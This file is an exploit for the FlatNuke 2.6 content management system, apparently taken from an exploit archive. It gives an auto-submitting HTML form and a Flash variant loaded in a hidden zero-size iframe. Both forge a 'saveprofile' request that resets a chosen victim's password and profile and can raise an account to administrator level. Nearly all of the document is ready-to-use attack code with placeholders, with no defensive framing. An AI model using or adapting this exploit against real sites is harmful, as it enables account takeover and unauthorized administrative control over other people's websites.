/* hackflatnuke.txt * * Tested on 2.6 FlatNuke version (can work on 3 but it has to be modified) * * With this trick you can steal/modifie a flatnuke account by changing the password and all the profile or change your profile and become an admin * * Requirements: - You have to know the nickname of the account u want to steal or change * */ HTML version modifiable <!-- flatnuke.html--> <html> <body> <title>Hack FlatNuke</title> <form method="POST" action="http://www.site.com/path_flatnuke/index.php?mod=none_Login"> <input type="hidden" name="action" value="saveprofile"> <input type="hidden" name="user" value="VICTIM"> <input type="hidden" name="regpass" value="NEW_PASS"> <input type="hidden" name="anag" value="NAME"> <input type="hidden" name="homep" value="VICTIM_SITE"> <input type="hidden" name="prof" value="PROFESSION"> <input type="hidden" name="prov" value="ORIGIN"> <input type="hidden" name="ava" value="blank.png"> <input type="hidden" name="url_avatar" value=""> <input type="hidden" name="firma" value="VICTIM"> <input type="hidden" name="level" value="LEVEL from 1 to 10 P.S. 10=administrator"> </form> <script> document.body.onload = document.forms[0].submit(); </script> </body> </html> <!-- Byez --> Flash versione that you have to export in a swf and import in a iframe exploit.swf var action:String = "saveprofile"; var user:String = "nome_user_che_modifichiamo"; var regpass:String = "nuova_pass"; var anag:String = "nome"; var homep:String = "sito_utente"; var prof:String = "professione"; var prov:String = "provenienza"; var ava:String = "blank.png"; var url_avatar:String = ""; var firma:String = "firma_utente"; var level:String = "livello da 1 a 10 N.B 10=amministartore"; getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login", "_self", "POST"); hackflatnuke.html <html> <head> <title>Title</title> </head> <body bgcolor="000000"> <center> <font face="Verdana" size="5" color="#FF0000"> Hack FlatNuke </font> <br/> <br/> <iframe src="exploit.swf" frameborder="0" height="0" width="0"></iframe> </center> </body> </html>